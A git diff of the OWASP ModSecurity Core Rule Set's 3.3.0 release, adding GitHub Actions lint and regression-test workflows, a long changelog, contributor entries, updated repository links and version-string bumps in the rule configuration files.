diff --git a/.github/ISSUE_TEMPLATE/01_false-positive.md b/.github/ISSUE_TEMPLATE/01_false-positive.md index 309fde04d..eeb0b7a3e 100644 --- a/.github/ISSUE_TEMPLATE/01_false-positive.md +++ b/.github/ISSUE_TEMPLATE/01_false-positive.md @@ -6,10 +6,6 @@ labels: 'False Positive' assignees: '' --- -PLEASE DON'T CREATE NEW ISSUES USING THIS REPO. - -WE ARE PERFORMING A MIGRATION RIGHT NOW. - ### Description diff --git a/.github/ISSUE_TEMPLATE/02_false-negative.md b/.github/ISSUE_TEMPLATE/02_false-negative.md index bfae5531b..75b0e3544 100644 --- a/.github/ISSUE_TEMPLATE/02_false-negative.md +++ b/.github/ISSUE_TEMPLATE/02_false-negative.md @@ -6,10 +6,6 @@ labels: 'False Negative - Evasion' assignees: '' --- -PLEASE DON'T CREATE NEW ISSUES USING THIS REPO. - -WE ARE PERFORMING A MIGRATION RIGHT NOW. - ### Description diff --git a/.github/ISSUE_TEMPLATE/03_bug-report.md b/.github/ISSUE_TEMPLATE/03_bug-report.md index ce8b5db83..bc130f67f 100644 --- a/.github/ISSUE_TEMPLATE/03_bug-report.md +++ b/.github/ISSUE_TEMPLATE/03_bug-report.md @@ -6,10 +6,6 @@ labels: 'Bug' assignees: '' --- -PLEASE DON'T CREATE NEW ISSUES USING THIS REPO. - -WE ARE PERFORMING A MIGRATION RIGHT NOW. - ### Describe the bug diff --git a/.github/ISSUE_TEMPLATE/04_feature.md b/.github/ISSUE_TEMPLATE/04_feature.md index 0cb85ed80..b2e82b611 100644 --- a/.github/ISSUE_TEMPLATE/04_feature.md +++ b/.github/ISSUE_TEMPLATE/04_feature.md @@ -6,10 +6,6 @@ labels: 'Feature Request' assignees: '' --- -PLEASE DON'T CREATE NEW ISSUES USING THIS REPO. - -WE ARE PERFORMING A MIGRATION RIGHT NOW. - ### Motivation diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml new file mode 100644 index 000000000..161deb47a --- /dev/null +++ b/.github/workflows/lint.yaml @@ -0,0 +1,38 @@ +--- +name: Lint + +on: [push, pull_request] + +jobs: + check-syntax: + runs-on: ubuntu-latest + strategy: + fail-fast: true + # check why is failing and change afterwards + steps: + - name: Checkout repo + uses: actions/checkout@v2 + + - name: Lint Yaml + uses: ibiqlik/action-yamllint@v1 + with: + file_or_dir: tests/regression/tests/**/*.yaml + config_file: .yamllint.yml + + - name: Linelint + uses: fernandrone/linelint@master + id: linelint + + - name: Set up Python 3 + uses: actions/setup-python@v1 + with: + python-version: 3.6 + + - name: "Check CRS syntax" + run: | + python -V + pip install --upgrade setuptools + pip install -r tests/integration/requirements.txt + git clone https://github.com/CRS-support/secrules_parsing + pip install -r secrules_parsing/requirements.txt + python secrules_parsing/secrules_parser.py -c -f rules/*.conf diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 000000000..1f2019b80 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,74 @@ +--- +name: Regression Tests + +on: + push: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + pull_request: + paths: + - 'rules/**' + - 'tests/**' + - '.github/**' + +jobs: + # "modsec2-apache", "modsec3-apache", "modsec3-nginx" + regression: + runs-on: ubuntu-latest + strategy: + # change to true + fail-fast: false + matrix: + modsec_version: [modsec2-apache] + tests: [REQUEST-911-METHOD-ENFORCEMENT, + REQUEST-913-SCANNER-DETECTION, + REQUEST-920-PROTOCOL-ENFORCEMENT, + REQUEST-921-PROTOCOL-ATTACK, + REQUEST-930-APPLICATION-ATTACK-LFI, + REQUEST-931-APPLICATION-ATTACK-RFI, + REQUEST-932-APPLICATION-ATTACK-RCE, + REQUEST-933-APPLICATION-ATTACK-PHP, + REQUEST-934-APPLICATION-ATTACK-NODEJS, + REQUEST-941-APPLICATION-ATTACK-XSS, + REQUEST-942-APPLICATION-ATTACK-SQLI, + REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION, + REQUEST-944-APPLICATION-ATTACK-JAVA] + # Will include soon for modsec3-nginx + + steps: + - name: Checkout repo + uses: actions/checkout@v2 + + - name: Set up Python 2 + uses: actions/setup-python@v1 + with: + python-version: 2.7 + + - name: "Run tests for ${{ matrix.modsec_version }}`" + env: + CONFIG: ${{ matrix.modsec_version }} + run: | + python -V + mkdir -p logs/"${CONFIG}" + docker-compose -f ./tests/docker-compose.yml up -d "${CONFIG}" + pip install --upgrade setuptools + pip install -r tests/regression/requirements.txt + # Use mounted volume path + if [[ "${CONFIG}" == *"nginx" ]]; then + LOGDIR="/var/log/nginx" + else + LOGDIR="/var/log/apache2" + fi + sed -ie "s:${LOGDIR}:${GITHUB_WORKSPACE}/logs/${CONFIG}:g" tests/regression/config.ini + py.test -vs tests/regression/CRS_Tests.py \ + --config="${CONFIG}" \ + --ruledir=./tests/regression/tests/${{ matrix.tests }} + + - name: Clean docker-compose + env: + CONFIG: modsec2-apache + run: | + docker-compose -f ./tests/docker-compose.yml stop "${CONFIG}" + docker-compose -f ./tests/docker-compose.yml down diff --git a/.linelint.yml b/.linelint.yml new file mode 100644 index 000000000..12e7c88e6 --- /dev/null +++ b/.linelint.yml @@ -0,0 +1,12 @@ +rules: + # checks if file ends in a newline character + end-of-file: + # set to true to enable this rule + enable: true + + # set to true to disable autofix (if enabled globally) + disable-autofix: true + + # will be ignored only by this rule + ignore: + - .pytest_cache/* diff --git a/.yamllint.yml b/.yamllint.yml new file mode 100644 index 000000000..6e15cc115 --- /dev/null +++ b/.yamllint.yml @@ -0,0 +1,18 @@ +extends: default + +rules: + # Test lines can be big + line-length: + max: 1024 + level: warning + # These files below have very large lines, needed for the test. + # So they will raise warnings every time. + ignore: | + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml + tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml + tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml + + # don't bother me with this rule + indentation: disable + + comments: {require-starting-space: false} diff --git a/CHANGES b/CHANGES index 1db31d8fa..80a0b6f65 100644 --- a/CHANGES +++ b/CHANGES @@ -1,10 +1,157 @@ == OWASP ModSecurity Core Rule Set (CRS) CHANGES == == Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == -* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues +* https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at * https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +== Version 3.3.0 - 2020-06-16 == + +Important changes: + * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the correct separator to use. + +New functionality: + * Block backup files ending with ~ in filename (Menin Andrea) + * Detect ffuf vuln scanner (Will Woodson) + * Detect SemrushBot crawler (Christian Folini) + * Detect WFuzz vuln scanner (#1614) (azurit) + * New ldap injection rule 921200 (Christian Folini) + * new rule HTTP Splitting (theMiddleBlue) + +Removed functionality: + * None. + +Improved compatibility: + * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) + +Fixes and improvements: + * fix(ci): use log_contains instead (Felipe Zipitria) + * Move test where it belongs (Federico G. Schwindt) + * fix(ci): use docker in DetectionOnly (Felipe Zipitria) + * fix(rule): remove dangling whitespace (Felipe Zipitria) + * fix(ci): run actions on .github change (Felipe Zipitria) + * fix(docs): update badges and links in readme (Felipe Zipitria) + * README: update repo link (Walter Hop) + * Update README: Copyright 2019 -> 2020 (Christian Folini) + * fix(ci): run tests also on PRs (Felipe Zipitria) + * fix(ci): change test name and fix default params (Felipe Zipitria) + * Restore Travis Status (was in the wrong repo) (Christian Folini) + * Remove outdated Travis status after migration (Christian Folini) + * feat(ci): adds github actions testing (Felipe Zipitria) + * fix(migration): post migration tasks (Felipe Zipitria) + * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) + * Added more explanations to comment of 920300 (Christian Folini) + * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) + * Update nextcloud excl rules and shorten var (Franziska Bühler) + * Change to preferred lowercase var (Franziska Bühler) + * Set var to lowercase and change comment (Franziska Bühler) + * Resolve issue with allowed_request_content_types (Franziska Bühler) + * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) + * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) + * XenForo: update exclusions (Walter Hop) + * WordPress: exclude additional URL fields in profile editor (Walter Hop) + * add www to link (NullIsNot0) + * Fix link for 941310 Old link does not work anymore. Change it to new one. (NullIsNot0) + * Add Content-Type: multipart/related as allowed default (jeremyjpj0916) + * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) + * make severities and scores consistent (Walter Hop) + * add QQGameHall UA (#1731) (theMiddle) + * another test (Allan Boll) + * Add word boundaries around values in SQL tautologies (942130) (Allan Boll) + * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) + * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) + * Fixes for 2 tests in 921200 (Christian Folini) + * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) + * Fix FPs for 942350 (#1706) (Franziska Bühler) + * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Narrowing down the subpattern .*? in 941130 (Christian Folini) + * Restricting a wide regex a bit (Christian Folini) + * Drop escapes (Christian Folini) + * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Remove trailing dot in several msg actions (#1678) (nerrehmit) + * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (theMiddle) + * Temporary travis workaround to buy time and fix it for good (#1684) (theMiddle) + * Add regression tests (Franziska Bühler) + * Fix FP with create with 942360 (Franziska Bühler) + * Avoid embedded anchors in CRS rule 942330 (Allan Boll) + * Update 942450 for less false positives, more tests (#1662) (Will Woodson) + * Ensure single ranges are also checked (#1661) (Federico G. Schwindt) + * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) + * For bugs, also ask for the environment (#1657) (Federico G. Schwindt) + * XenForo: fix incorrect escape (Walter Hop) + * XenForo: additional exclusions (Walter Hop) + * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) + * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. + * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) + * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) + * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) + * Also ask for the paranoia level (Federico G. Schwindt) + * Make it a tiny bit more colorful (Federico G. Schwindt) + * Spacing (Federico G. Schwindt) + * Fix emoji (Federico G. Schwindt) + * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) + * Fix paranoia-level log description (theMiddleBlue) + * change IRC to Slack (Walter Hop) + * fix spacing (Walter Hop) + * Moving tests and documentation folders (#1627) (soufianebenali) + * add triggered rule (#1636) (theMiddle) + * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) + * Mark stale issues (Federico G. Schwindt) + * Added support for >). Use negated classes for better performance. (Federico G. Schwindt) + * Add test for issue #1580 (#1612) (Federico G. Schwindt) + * removes t:lowercase (theMiddleBlue) + * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) + * Add PL1 tag. (Anna Winkler) + * Change version number for full version name (Felipe Zipitria) + * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) + * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) + * Ignore configuration files generated by the JetBrains editors (Anna Winkler) + * Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) + * Minor optimisation (Emile-Hugo SPIR) + * Also fix the `as herefrom` pattern (Emile-Hugo SPIR) + * More conservative fix (Emile-Hugo SPIR) + * Update the source file (Emile-Hugo SPIR) + * Fix a FP (`, aside from`) (Emile-Hugo SPIR) + * regression fix for #1581 (emphazer) + * Change order to check ip first in both rules (Felipe Zipitria) + * Change chain order (Felipe Zipitria) + * Fix spacing in text (Felipe Zipitria) + * Add link to mailing list archives (Felipe Zipitria) + * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) + * Update mailing list links to google group (Felipe Zipitria) + * Fix typo and add 2 new entries to 941160 (Franziska Bühler) + * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) + * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) + * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) + * adds .swp to restricted ext (theMiddleBlue) + * fix rule regex due to remove t:removeComments (theMiddleBlue) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) + == Version 3.2.0 - 2019-09-24 == New functionality: @@ -323,7 +470,7 @@ Documentation: * Fixed comment for arg limit check rule 920370 (Christian Folini) * Created CONTRIBUTORS file * Added Christoph Hansen (emphazer) to CONTRIBUTORS file - * Added Franziska Bühler (franbuehler) to CONTRIBUTORS file + * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 829ef4cf0..d91678ffd 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -150,4 +150,3 @@ Within a rule file / block, there are sometimes smaller groups of rules that bel Stricter siblings often have a different paranoia level. This means that the base rule and the stricter sibling do not reside next to one another in the rule file. Instead they are ordered in their appropriate paranoia level and can be linked via the first digits of the rule id. It is a good practice to introduce stricter siblings together with the base rule in the comments of the base rule and to reference the base rule with the keyword stricter sibling in the comments of the stricter sibling. E.g., "... This is performed in two separate stricter siblings of this rule: 9XXXX1 and 9XXXX2", "This is a stricter sibling of rule 9XXXX0." - diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index 88d4ee7e8..c697be7b5 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -1,3 +1,5 @@ +# Contributors + ## Project Co-Leads: - [Chaim Sanders](https://github.com/csanders-git) @@ -20,8 +22,10 @@ - [Zack Allen](https://github.com/zmallen) - [azhao155](https://github.com/azhao155) +- [azurit](https://github.com/azurit) - [Matt Bagley](https://github.com/bagley) - [Ryan Barnett](https://github.com/rcbarnett) +- [soufianebenali](https://github.com/soufianebenali) - [Peter Bittner](https://github.com/bittner) - [Allan Boll](https://github.com/allanbomsft) - [Jeremy Brown](https://github.com/jwbrown77) @@ -37,30 +41,38 @@ - [Aaron Haaf](https://github.com/Everspace) - [Michael Haas](https://github.com/MichaelHaas) - [jamuse](https://github.com/jamuse) +- [jeremyjpj0916](https://github.com/jeremyjpj0916) - [jschleus](https://github.com/jschleus) - [Krzysztof Kotowicz](https://github.com/koto) - [Max Leske](https://github.com/theseion) - Manuel Leos - [Evgeny Marmalstein](https://github.com/shimshon70) +- [meetug](https://github.com/meetug) - [Christian Mehlmauer](https://github.com/FireFart) - [Glyn Mooney](https://github.com/skidoosh) - [na1ex](https://github.com/na1ex) - [Jose Nazario](https://github.com/paralax) +- [Tim Herren](https://github.com/nerrehmit) - [Scott O'Neil](https://github.com/cPanelScott) +- [NullIsNot0](https://github.com/NullIsNot0) - [Robert Paprocki](https://github.com/p0pr0ck5) - [Christian Peron](https://github.com/csjperon) - [Elia Pinto](https://github.com/yersinia) +- [pyllyukko](https://github.com/pyllyukko) - [Brian Rectanus](https://github.com/b1v1r) - [Rufus125](https://github.com/Rufus125) - Ofer Shezaf - Breno Silva - siric\_ +- Emile-Hugo Spir - [Marc Stern](https://github.com/marcstern) - [Simon Studer](https://github.com/studersi) - [supplient](https://github.com/supplient) - [theMiddle](https://github.com/theMiddleBlue) - [Ben Williams](https://github.com/benwilliams) +- [Anna Winkler](https://github.com/annawinkler) - [Avery Wong](https://github.com/4v3r9) +- [Will Woodson](https://github.com/wjwoodson) - [Greg Wroblewski](https://github.com/gwroblew) - [XeroChen](https://github.com/XeroChen) - [ygrek](https://github.com/ygrek) diff --git a/INSTALL b/INSTALL index 63b806505..cf83cdb77 100644 --- a/INSTALL +++ b/INSTALL @@ -303,4 +303,3 @@ OWASP CRS Configuration crs-setup.conf file. There are many other options that have to do with aspects of web application security that are beyond this document but are well explained in crs-setup.conf. - diff --git a/README.md b/README.md index 74ba4300f..44f93e878 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,11 @@ -![Travis build v3.3/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.3/dev?label=v3.3%2Fdev) -![Travis build v3.2/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.2/dev?label=v3.2%2Fdev) -![Travis build v3.1/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.1/dev?label=v3.1%2Fdev) -[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Flagship_Projects) +![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) +![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) +![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) +[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + + # OWASP ModSecurity Core Rule Set (CRS) @@ -16,7 +19,7 @@ Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. -[Create an issue on GitHub](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. +[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. [Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. @@ -24,6 +27,6 @@ We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beg ## License -Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. diff --git a/crs-setup.conf.example b/crs-setup.conf.example index 99957c6bb..7b140b9a6 100644 --- a/crs-setup.conf.example +++ b/crs-setup.conf.example @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -88,7 +88,7 @@ # Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. -# - To change the disruptive action, see RESPONSE-999-EXCEPTIONS.conf.example +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html @@ -98,7 +98,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Example: Anomaly Scoring mode, log only to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. -# - To change the disruptive action, see RESPONSE-999-EXCEPTIONS.conf.example +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html @@ -569,7 +569,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # entry in the audit log (for performance reasons), but an error log entry is # written. If you want to disable the error log entry, then issue the # following directive somewhere after the inclusion of the CRS -# (E.g., RESPONSE-999-EXCEPTIONS.conf). +# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). # # SecRuleUpdateActionById 901150 "nolog" # @@ -825,4 +825,4 @@ SecAction \ nolog,\ pass,\ t:none,\ - setvar:tx.crs_setup_version=320" + setvar:tx.crs_setup_version=330" diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example index 1fb97cc86..8a23edafb 100644 --- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example +++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf index 1de9cc6cc..06aa944e5 100644 --- a/rules/REQUEST-901-INITIALIZATION.conf +++ b/rules/REQUEST-901-INITIALIZATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -25,7 +25,7 @@ # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature # -SecComponentSignature "OWASP_CRS/3.2.0" +SecComponentSignature "OWASP_CRS/3.3.0" # # -=[ Default setup values ]=- @@ -58,7 +58,7 @@ SecRule &TX:crs_setup_version "@eq 0" \ log,\ auditlog,\ msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL'" @@ -76,7 +76,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.inbound_anomaly_score_threshold=5'" # Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf) @@ -85,7 +85,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.outbound_anomaly_score_threshold=4'" # Default Paranoia Level (rule 900000 in setup.conf) @@ -94,7 +94,7 @@ SecRule &TX:paranoia_level "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.paranoia_level=1'" # Default Executing Paranoia Level (rule 900000 in setup.conf) @@ -103,7 +103,7 @@ SecRule &TX:executing_paranoia_level "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'" # Default Sampling Percentage (rule 900400 in setup.conf) @@ -112,7 +112,7 @@ SecRule &TX:sampling_percentage "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.sampling_percentage=100'" # Default Anomaly Scores (rule 900100 in setup.conf) @@ -121,7 +121,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ @@ -129,7 +129,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ @@ -137,7 +137,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ @@ -145,7 +145,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.notice_anomaly_score=2'" # Default do_reput_block @@ -154,7 +154,7 @@ SecRule &TX:do_reput_block "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.do_reput_block=0'" # Default block duration @@ -163,7 +163,7 @@ SecRule &TX:reput_block_duration "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.reput_block_duration=300'" # Default HTTP policy: allowed_methods (rule 900200) @@ -172,7 +172,7 @@ SecRule &TX:allowed_methods "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Default HTTP policy: allowed_request_content_type (rule 900220) @@ -181,7 +181,7 @@ SecRule &TX:allowed_request_content_type "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'" # Default HTTP policy: allowed_request_content_type_charset (rule 900270) @@ -190,7 +190,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" # Default HTTP policy: allowed_http_versions (rule 900230) @@ -199,7 +199,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" # Default HTTP policy: restricted_extensions (rule 900240) @@ -208,7 +208,7 @@ SecRule &TX:restricted_extensions "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + 